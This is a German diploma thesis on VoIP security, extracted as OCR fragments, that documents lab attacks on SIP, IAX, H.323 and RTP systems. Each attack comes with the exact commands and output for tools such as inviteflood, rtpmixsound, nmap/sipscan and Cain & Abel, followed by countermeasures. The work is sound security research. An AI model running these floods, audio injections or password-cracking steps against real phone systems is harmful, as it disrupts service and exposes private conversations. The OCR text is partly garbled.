Diplombericht
Contents
1. 6 4 5 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 151 6 5 1 VLAN Angriff 152 6 6 1 DOS PING Flood 153 6 6 2 Technik und Funktionsweise 154 6 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 154 6 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 155 6 7 1 IP Spoofing 156 6 7 2 Technik und Funktionsweise 157 6 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 157 6 7 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 160 6 8 1 IRDP Spoofing 161 6 8 2 Technik und Funktionsweise 162 6 8 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 162 6 8 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 164 6 9 1 ICMP Redirect 165 6 9 2 Technik und Funktionsweise 166 6 9 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 166 6 9 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 167 6 10 1 DHCP Starvation DHCP Rouge Server 168 6 10 2 Technik und Funktionsweise 169 6 10 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 169 6 10 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 171 6 11 1 DoS SYN Flood 172 6 11 2 Technik und Funktionsweise 173 6 11 3 Au2. x nemesis mit RTP Paket iSEC RTP Flood DOS Downloadlink Quelle des Tools Schweregrad http www isecpartners com rtp_injection_files html 1 leicht 6 schwer Nemesis ist in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installation Tool 5 Anwendung Tool 5 Nemesis ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 6 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 iSEC RTP Flood ist ein vordefiniertes IP Paket welches mit Hilfe von Gefahrenpotential nemesis zum Angriffsziel gesendet wird 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Dieser Angriff zielt auf die Verf gbarkeit der Sprachkan le ab Der Angreifer flutet ein Endger t oder den VOIP Server mit RTP Sprachpaketen Ziel ist es das Angriffsziel mit einer sehr grossen Menge RTP Paketen derart zu bombardieren dass dieses nur noch damit besch ftigt ist diese Pakete abzuarbeiten Dabei kann das Angriffsziel den blichen Aufgaben nicht mehr nachkommen Die wirklich anstehenden RTP Pakete der aktuellen Verbindung in der sich das Angriffsziel momentan befindet k nnen nicht mehr fristgerecht abgearbeitet werden Sehr grosse Verz gerungen das Verwerfen von RTP Paketen bis hin zum Verbindungsabbruch sind die Folgen dieser Attacke Schutz gegen Angriff Analyse Switches mit DoS Detektoren verwenden welche
3. Eingesetztes Tool Verf gbarkeit Cain amp Abel und Wireshark Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert Ziel Angriff Analyse Dieser Angriff zielt auf die Vertraulichkeit ab Dabei h rt der Angreifer das Netzwerk nach RTP Sprachpaketen ab und zeichnet diese auf Diese Pakete lassen sich jeweils einem bestimmten Gespr chskanal zuordnen und k nnen dank der Nummerierung der Pakete wieder in der richtigen Reihenfolge als Audio File wiedergegeben werden Dadurch h rt der Angreifer den gesamten Gespr chsinhalt der kommunizierenden Angriffsziele mit Schutz gegen Angriff Analyse Siehe Massnahmen SRTP Kapitel 8 4 1 Siehe Massnahmen Tunneln mit IPSec Kapitel 8 4 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security S Sch r MAS 06 02 20 Seite 115 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 2 2 Technik und Funktionsweise Um den Netzwerkverkehr nach RTP Sprachpaketen abzuhorchen werden Netzwerkmonitore eingesetzt Diese zeichnen alle Pakete die bers Netzwerk transportiert werden auf und je nach Implementation lassen sich aus diesen heraus gleich WAV Files der aufgez
4. root Konqueror lt 2 gt Location Edit View Go Bookmarks Tools Settings Window Help eocet 00 2 93 Mam a E gt Location om froot 4 AET wi 3 Das Logfile logfileARPPoisoning pcap kann mittels Wireshark ge ffnet und die RTP Pakete als Audiowiedergabe abgespielt werden Siehe dazu auch Kapitel 5 2 1 Eile Edit iew Go Capture Analyze Statistics Help Filter S Expression Clear Apply No Time Source Destination Protocol Info 389 505 862607 vmware_55 dd b4 Broadcast ARP who has 10 1 1 129 Tell 10 1 1 107 390 505 863401 Aastra_19 93 a7 vmware_55 dd b4 ARP 10 1 1 129 is at 00 08 5d 19 93 a7 Frame 1 60 bytes on wire 60 bytes captured Ethernet II Src Netopia 21 79 14 00 0f cc 21 79 14 Dst Aastra_82 10 e8 00 08 5d 82 10 e8 Internet Protocol Src 212 117 200 148 212 117 200 148 Dst 10 1 1 201 10 1 1 201 0000 00 08 5d 82 10 e8 00 OF cc 21 79 14 08 00 45 00 y E j 6 1 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Durch ARP Spoofing kann der Angreifer eine MitM Man in the Middle Attacke ausf hren Er funktioniert somit als Zwischenstelle wo der gesamte Daten respektive Sprachverkehr seiner Angriffsziele dar ber l uft Einerseits kommt der Angreifer in Kenntnis mit wem und wann seine Angriffsziele kommunizieren und was der Gespr chsinhalt ist Andererseits laufen ber ihn auch s mtliche Registrieru
5. Ziel Angriff Analyse Bei der Enumeration geht es dem Angreifer darum im ganzen Ziel Netzwerk so viele Informationen ber die angeschlossenen User Agents Hard oder Softphones Registrars Proxy Server und Redirect Server zu erhalten wie es berhaupt m glich ist Die Enumeration steht meist am Anfang weiterer Angriffe welche jedoch erst mit den aus der Enumeration gewonnen Kenntnissen m glich sind Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren denn die Ports m ssen f r die korrekte Funktionalit t offen bleiben Einzige m gliche Massnahmen sind Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Zenmap ist nichts anderes als nmap mit der GUI Erweiterung Diese GUI Erweiterung ist je nach Installationspaket von nmap automatisch darin enthalten Dieser Angriff l sst sich sowohl mit zenmap wie auch mit nmap ausf hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 32 2 2 2 Technik und Funktionsweise Berner Fachhochschule Technik und Informatik Software Schule Schweiz F r die Enumeration werden Portscanner eingesetzt Mit dem Wissen dass die SIP Terminals Registrars und SIP Proxy Server normalerweise auf dem Port 5060 das spezifisch nach offenen 5060 Ports gesucht werden Netzwerk nach eingehenden Nachrichten abh ren kann Der Einsatz dieses Tools wird dem Angreif
6. Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vorkommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht auf einen Post it Notizzettel unter dem Telefonieterminal oder der PC Tastatur Siehe Massnahmen Substandards H 235 1 bis H 235 5 Kapitel 8 3 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Nachtr gliche Bemerkungen Abkl rungen mit einem Buchautor VOIP Hacking haben ergeben dass f r die offline Dictionary Attacke IAX Brute eingesetzt werden kann Infolge der sp ten Antwort dieses Buchautors konnte leider diese offline Dictionary Attacke gegen das MD5 gehashte H 323 Passwort nicht mehr ausgef hrt werden Der Angriff wird zwecks Vollst ndigkeit trotzdem aufgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 108 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 4 32 Technik und Funktionsweise Die mit H 323 am meisten eingesetzte Authentifizierungs Methode ist das MD5 Password Hashing Dazu wird der Benutzername das Passwort und der Zeitstempel ASN 1 encoded und daraus einen MD5 Hashwert ge
7. Was die Kommandos und Argumente im Einzelnen bedeuten wurde zuvor schon bei obigem Angriff erkl rt Der Angriff verh lt sich anders als zuvor beim Test des User Agents 4129 Protos Test Suite l uft vollst ndig durch und somit kommt auch immer eine Response Antwort von der Applikation X Lite zur ck KKK bt protos voip java jar c07 sip r2 jar touri 4119 10 1 1 101 fromuri 4999 10 1 1 101 teardown sendto 10 1 1 151 delay 1000 dport 18372 validcase start 1 single valued java class path using it s value for jar file name reading data from jar file c07 sip r2 jar Sending valid case test case 0 445 bytes Received Returncode 486 Sending CANCEL test case 0 224 bytes Received Returncode 481 Sending ACK test case 0 218 bytes Sending Test Case 1 test case 1 444 bytes Received Returncode 400 Sending valid case test case 4526 451 bytes Received Returncode 486 Sending CANCEL test case 4526 230 bytes Received Returncode 481 Sending ACK test case 4526 224 bytes Received Returncode 486 okk Auf den ersten Blick scheint X Lite resistent gegen diesen Angriff zu sein Jedoch wenn der PC des Angriffziels betrachtet wird auf welchem X Lite gestartet war zeigt sich ein anders Bild Obwohl nach jeder durch Protos gesendeten INVITE Nachricht eine CANCEL Nachricht gesendet wurde welche die INVITE Nachricht h tte abbauen sollen stehen ankommende Anrufe an es klingelt und es ist keine freie Linie mehr
8. Real Time Transport Protocol oee Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet rtpmixsound lachensox wav a 10 1 1 101 A 14354 b 10 1 1 241 B 50076 i eth0 v Die Werte im Einzelnen stehen wie folgt f r rtpmixsound Aufruf des Angriff Tools Lachensox wav Audioquelle welche in das Gespr ch eingef gt werden soll a 10 1 1 101 Quell IP Adresse der RTP Sprachpakete gespoofte Absenderadresse A 14354 Quell Port gespooftes Absenderport ersnifft siehe Bild oben b 10 1 1 241 Empf nger IP Adresse der RTP Sprachpakete Angriffsziel B 5076 Empf nger Port Port Angriffsziel ersnifft siehe Bild oben i ethO Besagt ber welche Schnittestelle des PC s die Daten gesendet werden sollen v Voransicht Tool erzeugt mehr Logs Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 122 oh ok bt rtpmixsound lachensox wav a 10 1 1 101 A 14354 b 10 1 1 241 B 50076 i ethO v rtpmixsound Version 3 0 JanUser Agentry 03 2007 source IPv4 addr port 10 1 1 101 14354 dest IPv4 addr port 10 1 1 241 50076 Input audio file lachensox wav spoof factor 2 jitter factor output spoofed packets ASAP Verbose mode Audio file format RIFF 0x52 0x49 0x46 0x46 Total Audio File Size 26219 Pre recorded audio content format WAVE 0x57 0x41 0x56 0x45 Next chunk header type fmt 0x66 Ox6d 0x74 0x20 Compression Code 1 Channels 1 Sample Rate
9. 4 Das Tool ist nur unter Windows lauff hig die Installation ist Erforderliche Vorkenntnisse 4 men gef hrt Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Die meisten Netzwerke werden heute mittels Switches aufgebaut In einem geswitchten Netzwerk werden die Daten jeweils nur an dasjenige Switchport gesendet an welchem sich auch der f r die Daten bestimmte PC befindet Mittels MAC Flooding gelingt es einem Angreifer dass der Switch die Daten an alle Ports sendet Somit kann auf den anderen Ports mitgehorcht werden was die an diesem Switch angeschlossen Rechner bers Netzwerk senden oder empfangen Dies k nnen zum Beispiel Registrierungsdaten wie Benutzernamen und Passw rter geheime Finanzzahlen oder Sprachpakete aktueller VOIP Gespr che sein Schutz gegen Angriff Analyse Switche mit DoS Detektoren verwenden welche solche Angriffe unterbinden Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 143 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 3 2 Technik und Funktionsweise Switche f hren intern eine MAC Tabelle Darin wird dynamisch festgehalten an welchem Port zur Zeit welcher PC angeschlossen ist Die Identifikation des PC s wird jeweils ber dessen MAC Adresse bewerkst
10. BS Panasonic Communications Co 121 cE SF Aastra 129 cE AV Aastra 151 So Intel Corporate S Sch r MAS 06 02 20 Seite 33 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Durch Klicken auf einen bestimmten Host werden mehr Detailinformationen wie zum Beispiel MAC Adresse Device Type Operating System und Network Distance preisgegeben Mit der MAC Adresse ist auch der Hersteller dieses Devices aufgelistet Solche Informationen liefern f r sp tere Angriffe sehr n tzliche Hinweise we u ae Scan Tools Profile Help 4 Target Profile Command nmap sU p 5060 10 1 1 0 24 Hosts Services Nmap Output Ports Hosts Topology Host Details Scans nmap PE v PA21 23 80 3389 sU A T4 10 1 1 129 OS y Host v w 10111 r a j FAR P Starting Nmap 4 76 http nmap org at 2008 12 23 13 40 Mitteleurop ische Zeit 1011101 Initiating ARP Ping Scan at 13 40 1011102 Scanning 10 1 1 129 1 port Completed ARP Ping Scan at 13 40 0 243 elapsed 1 total hosts E 1011103 Initiating Parallel DNS resolution of 1 host at 13 40 111121 ompleted Parallel DNS resolution of 1 host at 13 40 0 01s elapsed Initiating UDP Scan at 13 40 1011129 Scanning 10 1 1 129 1000 ports w 1011151 Completed UDP Scan at 13 41 5 92s elapsed 1000 total ports Initiating Service scan at 13 41 1011241 Scanning 41 services on 10 1 1 129 Completed Service scan at 13 4
11. Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 2 12 2 Technik und Funktionsweise Der Angreifer sendet beim Flooding eine sehr grosse Menge INVITE Nachrichten an das Angriffsziel Dieses muss die empfangenen Nachrichten abarbeiten und kann dadurch die sonst anstehenden Aufgaben wie Vermittlung der RTP Pakete oder Verbindungsanfragen anderer User Agent nicht fristgerecht abarbeiten 2 12 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Bei nachfolgendem Angriff soll der User Agent 4129 mit der IP Adresse 10 1 1 129 mittels inviteflood angegriffen werden Das Terminal des User Agent 4129 Aastra 57i befindet sich in Ruhestellung ist also nicht in einer aktuellen Gespr chsverbindung Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet inviteflood ethO 4129 10 1 1 101 10 1 1 129 1000000 Die Argumente im Einzelnen stehen wie folgt f r inviteflood gt gt spricht das Tool an startet es und bergibt nachfolgende Argumente ethO gt gt definiert die Schnittstelle ber welche die Nachricht gesendet werden soll 4129 gt gt Nummer des User Agents an welchen die INVITE Nachrichten gesendet werden sollen 10 1 1 101 gt gt IP Adresse Domain SIP Proxy Server an welchem das Angriffsziel angeschlossen ist 10 1 1 129 gt gt IP Adresse des Angriffszieles 1000000 gt gt Anzahl INVITE Meldungen die zum Angriffsziel gesendet werden sollen KKK
12. Die aktuelle und zu Zeit eingesetzte Version ist AX2 Die ganze Architektur und Implementierung des IAX Protokolls ist bewusst sehr simpel gehalten Dies bietet gegen ber den anderen bekannten Signalisierungsprotokollen wie SIP oder H 323 klare Vorteile Durch den kleinen Protokoll Overhead kann IAX auch bei kleinen Bandbreiten wie G 729 oder GSM eingesetzt werden Mit einer Sende Datenrate von ca 38kBit s sind sogar Verbindungen ber analoge Modems m glich Es wird nur ein einziger Port f r die bertragung des Audiostreams und der Signalisierung ben tigt somit fallen auch die bekannten NAT oder Firewallprobleme weg wie sie zum Beispiel bei SIP oder H 323 vorkommen Der Endpoint braucht lediglich den Port UDP 4569 offen zu halten IAX2 wurde infolge fehlender Sicherheitsmechanismen entwickelt Mit IAX2 wurde die M glichkeit geschaffen per Challenge Response Verfahren die Gegenstellen zu authentifizieren dies kann durch einen MD5 Hashwert oder eine RSA Verschl sselung sein Auch steht eine AES 128 Bit Datenverschl sselung zur Verf gung Somit bietet IAX2 die M glichkeit die Datenintegrit t sowie die Vertraulichkeit gew hrleisten zu k nnen Oftmals werden jedoch aus Unwissenheit oder Bequemlichkeit genau diese Sicherheitskomponenten nicht angewendet und Passw rter resp Benutzernamen in Klartext ber das Netzwerk bertragen Einem Angreifer bietet sich die M glichkeit einen Endpoint mit sehr vielen IAX2 Nachrichten zu fluten un
13. IAX Brute exe ist unter Windows lauff hig und wird via Commandline Erforderliche Vorkenntnisse 5 aufgerufen Siehe Beispiel unten Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Asterisk Proxy Server erlauben folgende drei verschiedene Authentifizierungen der IAX Clients Klartext MD5 oder RSA RSA wird infolge des hohen Handling Aufwandes des Schl sslepaares public und private key sehr selten eingesetzt obwohl sie die sicherste w re Die MD5 Authentifizierung bietet auch nur dann einen wirksamen Schutz wenn sichere Passw rter verwendet werden Bei der Klartext Authentifizierung werden sowohl Benutzername als auch Passwort in Klartext ber das Netzwerk gesendet Ziel des Angreifers ist es an Passw rter und die dazugeh rigen Benutzerkonten zu kommen Einmal im Besitz dieser Angaben kann der Angreifer ein eigenes Telefon mit den falschen Benutzerkonten an das Netzwerk anschliessen Dadurch wird die Registrierung des zuvor im Netzwerk vorhandenen originalen IAX Clients gel scht Alle ankommenden Anrufe klingeln beim Angreifer Auch kann der Angreifer abgehende Gespr che mit falscher Identit t f hren Somit k nnen auch Gespr che auf Kosten anderer gef hrt werden Schutz gegen Angriff Analyse Es m ssen zwingend sichere Passw rter verwendet werden Sichere Passw rter sind keine W rter die in einem Dictionary oder Duden vork
14. Nachricht welche vom Asterisk Proxy Server an das Angriffsziel gesendet wurde Es ist zu sehen dass die Source MAC Adresse zur derjenigen in der oben gespooften Nachricht abweicht gesinfft Verbindungsaufbau 251 sendet File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 15034 73 752252 10 1 1 101 10 1 1 241 UDP Source port 14354 Destination port 50076 Frame 15034 214 bytes on wire 214 bytes captured S Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst CompalIn_Ob ad 96 00 1e ec 0b ad 96 amp Destination CompalIn_Ob ad 96 00 1e ec 0b ad 96 Address CompalIn_Ob ad 96 00 1e ec 0b ad 96 5 3 1 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Die beiden Gespr chspartner werden verwirrt sein h ren Ger usche von der Gegenseite die sie eigentlich nicht h ren sollten Sie f hlen sich vom anderen Gespr chspartner belogen oder ahnen dass jemand mitlauscht Dies kann zu ganz schwierigen sowohl gesch ftlichen wie auch pers nlichen Auseinandersetzungen f hren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 124 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 5 4 1 RTP Flooding Integritat RESTE RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit
15. pase so 1 ver Done Scanning Save Results under File Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 36 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Nach erfolgtem Scann Vorgang werden die Ergebnisse angezeigt und k nnen auch als File abgespeichert werden Das Resultat f r obigen Scann Vorgang sieht wie folgt aus ok ok SIPSCAN Results Scan started Mon Dec 22 21 01 34 2008 Target SIP Server 10 1 1 101 5060 UDP Domain 10 1 1 101 1 gt gt Found a live extension user at 4002 10 1 1 101 with SIP response code s REGISTER 200 2 gt gt Found a live extension user at 4003 10 1 1 101 with SIP response code s REGISTER 200 3 gt gt Found a live extension user at 4111 10 1 1 101 with SIP response code s REGISTER 200 4 gt gt Found a live extension user at 4115 10 1 1 101 with SIP response code s REGISTER 200 5 gt gt Found a live extension user at 4119 10 1 1 101 with SIP response code s REGISTER 401 6 gt gt Found a live extension user at 4129 10 1 1 101 with SIP response code s REGISTER 200 RK Aus den SIPSCAN Resultaten ist folgendes zu entnehmen Es gibt f r folgende User Agents g ltige Konten beim Registrar 4002 4003 4111 4115 4119 und 4129 Die Registrierung f r die User Agents 4002 4003 4111 4115 und 4120 wurde mit einer Response Nachricht REGISTER 200 beantwortet was so viel wie OK heisst Dies sagt aus dass einerseits die im
16. SIP gt GRE PPP 0 lt gt PPPoE 0 m il A E Hosts APR Routing Fh Passwords Mittels rechter Maustaste gt gt Send to Cracker wird dieser Eintrag in den Tab Cracker von Cain amp Abel kopiert Danach wird in den Tab Cracker gewechselt B File View Configure Tools Help ETTITT o u 090mmEs08n OF it HTTP 1043 B mar 0 Send Allto Cracker EA LDAP 0 iD POP3 0 EEE La s SMB 0 Remove All mee m Mittels rechter Maustaste gt gt Dictionary Attack wird der Angriff der W rterbuch Attacke Dictionary Attack eingeleitet B File View Configure Tools Help awohhn o 8 an ummusoen OF i Cracker decodes E newer E Sue cocker O Taero WN CSU Wises ED Quer Resin Dr Nonce Resp nated A LM amp NTLM Hast BR NTLMv2 Hashes Dictionary Attack BR MS Cache Hashe Brute Force Attack amp PWL files 0 WH Cisco 10S MDS H Salat AN AB Cisco PIX MDS Hi Note QP APOP MDS Hashi CRAM MOS Hash a anie p OSPF MDS Hashe f gt RIPV2 MD5 Hashe Ri 5 gt VRRP HMAC Has BERN Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 46 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Im Fenster Dictionary Attack k nnen durch Rechtsklicken mit der Maustaste ins weisse File Feld W rterlisten Wor
17. SIP wird sich am Markt immer mehr durchsetzen und ltere bestehende Protokolle wie H 323 verdr ngen Eine Standardimplementierung von SIP ohne zus tzliche Schutzmassnahmen bietet bez glich Integrit t und Verf gbarkeit keinen wirklichen Schutz Mittels gezielten Angriffen wie DoS oder Flooding kann ein ungesch tztes VOIP System innert k rzester Zeit komprimitiert werden In den letzten Jahren sind jedoch vermehrt im Bereich kryptographischer Protokolle Entwicklungen und Neuimplementierungen zu beobachten gewesen Dies deutet darauf hin dass ein Umdenken und Handeln betreffend der VOIP Sicherheit bereits statt gefunden hat und innert k rzester Zeit neue Sicherheitsmerkmale auf Ebene der Protokolle und Signalisierung verf gbar sein werden 11 Fazit Mit dem Einsatz der heute schon verf gbaren Sicherheitsmerkmale ist VOIP eine ernstzunehmende Alternative zur herk mmlichen Analog oder Digital Telefonie Mit der weiteren Entwicklung der Sicherheitsmerkmale werden diese Systeme die bisherigen Technologien abl sen und den Telefonie Markt beherrschen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 197 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 12 Quellen Angaben Internet Links http www voipsa org http www hackingvoip com http de wikipedia org http www isecpartners com http remote exploit org backtrack_download html https downloads bsi fuer buerger de lit
18. bt inviteflood eth0 4129 10 1 1 101 10 1 1 129 1000000 inviteflood Version 2 0 June 09 2006 source IPv4 addr port 10 1 1 107 9 dest IPv4 addr port 10 1 1 129 5060 targeted User Agent 4129 10 1 1 101 Flooding destination with 1000000 packets sent 1000000 bt KKK Der Angriff erzielte folgende Wirkung Verhalten des Ger tes w hrend Flooding Weder ankommende noch abgehende Gespr che sind m glich das Ger t bleib stumm Verhalten des Ger tes nach dem Flooding Ger t beginnt auf allen Leitungstasten zu klingeln diese Rufe m ssen einzeln abgebaut werden Danach ist das Ger t wieder betriebsbereit Untenstehender Wireshark Trace zeigt das Flooding des User Agents 4129 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 73 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Der User Agent 4119 mit dem Soft Phone X Lite wurde ebenfalls geflutet Da es sich um ein Softphone handelt musste hierzu in der Befehlszeile speziell das Port auf welchem das Softphone das Netzwerk nach SIP Nachrichten abhorcht mittels dem String D 14452 eingegeben werden ok ok bt inviteflood eth0 4119 10 1 1 101 10 1 1 151 1000000 D 14452 inviteflood Version 2 0 June 09 2006 source IPv4 addr port 10 1 1 107 9 dest IPv4 addr port 10 1 1 151 5060 targeted User Agent 4119 10 1 1 101 Flooding destination with 1000000 packets sent 1000000 bt KKK
19. 8 5 18 Zugangs und Zugriffsschutz Netzwerkkomponenten und Netzwerkanschl sse sind vor unberechtigtem Zutritt physikalisch zu sch tzen Eine Netzwerkauthentisierung wie Port Security NAC oder 802 1x sch tzt vor logischem unberechtigtem Zugang Remote Zug nge sind entsprechend zu sch tzen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 194 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 9 Zusammenfassung Pers nliche Schlussbemerkungen Diese Diplomarbeit besch ftigte sich mit den Gefahren und Sicherheitsm ngel der VOIP Telefonie Prim r war das Ziel dieser Arbeit aufzuzeigen ob und wie leicht mit welchen Tools welche im Internet frei verf gbar sind Angriffe gegen VOIP Systeme vollzogen werden k nnen Es war nicht das Ziel eine Zusammenfassung schon bestehender Dokumente ber VOIP Security zu machen welche zu Gen ge im Internet auffindbar sind Dadurch war der praktische Teil der das Ausf hren der Angriffe gegen die VOIP Systeme und Protokolle beinhaltete der zeitintensivste Es wurden zuerst die gem ss Pflichtenheft zu testenden und definierten VOIP Protokolle SIP H 323 SDP IAX RTP RTCP und MGCP Megaco gr ndlich analysiert und bewertet Dabei konnten die Protokolle in lohnenswerte und nicht lohnenswerte Angriffs Ziele unterteilt werden Massgebend f r diese Klassifizierung war ihre Anwendung und Verbreitung was sich auch in der Verf gbarkeit existi
20. Byte 0 Byte 1 Byte2 Byte 3 Bit 011 23 4 5 6 7 Bit 01112345 6 7 Bit 011 2 3 456 7 Bit 01 23 14 56 7 V 2 P X CC M PT sequence number timestamp in sample rate units synchronization source SSRC identifier contributing source CSRC identifiers optional Header Extension optional Quelle Bild http de wikipedia org wiki Real Time_Transport_Protocol V Version des RTP Protokolls 2 Bit P Padding gesetzt wenn ein oder mehrere F ll Oktets an Ende des Paketes angeh ngt sind X Extension gesetzt wenn Header um ein Erweiterungsheader erg nzt wird CC CSRC Z hler gibt Anzahl CSRC Identifier an M Marker reserviert f r anwendungsspezifische Verwendung PT Payload Type Format des zu transportierenden RTP Inhaltes Sequence N Inkrementiert mit jedem Paket Empf nger kann Reihenfolge der Pakete wieder herstellen Timestamp Wird zur Synchronisation verwendet 32 Bit SSRC Identifikationsnummer der Synchronisationsquelle 32 CSRC Liste Liste der Identifikationsquellen welche im RTP Payload enthalten sind Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 113 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 5 1 2 RTOP Real time ControlTransport Protocol Einf hrung Im gleichen RFC wie RTP wurde auch RTCP definiert RTCP wird fiir die Einhaltung und Aushandlung von QOS Quality of Service eingesetzt Dabei werden zwischen Source und Destination periodisch Steuernachricht
21. Cain amp Abel snifft das Netzwerk nach MD5 Hashwerten ab die dar ber gesendet werden und speichert diese inklusive der restlichen ben tigten Daten welche in Klartext bertragen wurden Nach ersnifften MD5 Hashwerten kann via Cain amp Abel eine offline Dictionary Attacke gestartet werden 2 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer h rt das Netzwerk nach bertragenen MDS ab In diesem Beispiel registriert sich gerade User Agent 4119 am Asterisk Proxy Server 10 1 1 101 Damit der Angreifer die im Netzwerk ausgetauschten MD5 Hashwerte sniffen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Nach dem Starten von Cain amp Abel wird der Sniffer mittels zweitem Icon von links gestartet Der Tab Sniffer wird gew hlt und in diesem wiederum den Tab Passwords am unteren Bildschirmrand Cain amp Abel snifft jetzt dauernd das Netzwerk ab sortiert die empfangenen Daten und kategorisiert sie nach den entsprechenden Diensten i el E cee File View Configure Tools Help alp Och m o 2 Ommegang A Decoders Network Sniffer Cracker Traceroute M CCDU C Wireless Fo Que ED ry Fy Passwords A p FTP 0 amp HTTP 1140 G IMAP 0 EA LDAP 0 P PoP3 0 s SMB 0 B Telnet 0 rd VNC 0 fy TDs 0 Es TNS 0 WE SMTP 0 NNTP 0 DCE RPC 0 63 MSKerb5 PreAutt SA Radius Keys 0 Radius Users 0 amp 1CQ 0
22. Hz 8000 Avg Bytes sec 8000 Block Align 1 Significant Bits sample 8 Next chunk header type data 0x64 0x61 0x74 0x61 chunk data size 26175 Audio read from input file eqUser Agenttes to 163 G711 packets At an ideal playback rate of 50 Hz this represents 3 26 seconds of audio Ready to inject press lt ENTER gt to begin injection eth0 s MAC 00 0c 29 42 86 fe e eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz pcap filter installed for live audio stream sniffing src host 10 1 1 101 and dst host 10 1 1 241 and udp sre port 14354 and udp dst port 50076 and not ether sre 00 0c 29 42 86 fe pcap live eth0 interface is blocking Attempting to sniff RTP packets from the specified audio stream Successfully detected a packet from targeted audio stream source MAC 00 14 22 f0 22 43 destination MAC 00 le ec 0b ad 96 source IP 10 1 1 101 destination IP 10 1 1 65521 source port 14354 destination port 50076 UDP packet length 180 RTP message length 172 Size of RTP Header 12 RTP Version 2 RTP Packet Padded no RTP Packet Fixed Hdr Followed by Extension Hdr no RTP Packet CSRC Count 0 RTP Packet Marked no RTP Packet Payload Type 0 RTP Packet Sequence 21243 RTP Packet Timestamp 3099360 RTP Packet SSRC 1408885980 __RTPMIXSOUND_LIBNET_PROTOCOL_LAYER 3 Will inject spoofed audio at IP layer Will now synchronize the mixing interlacing of the pre
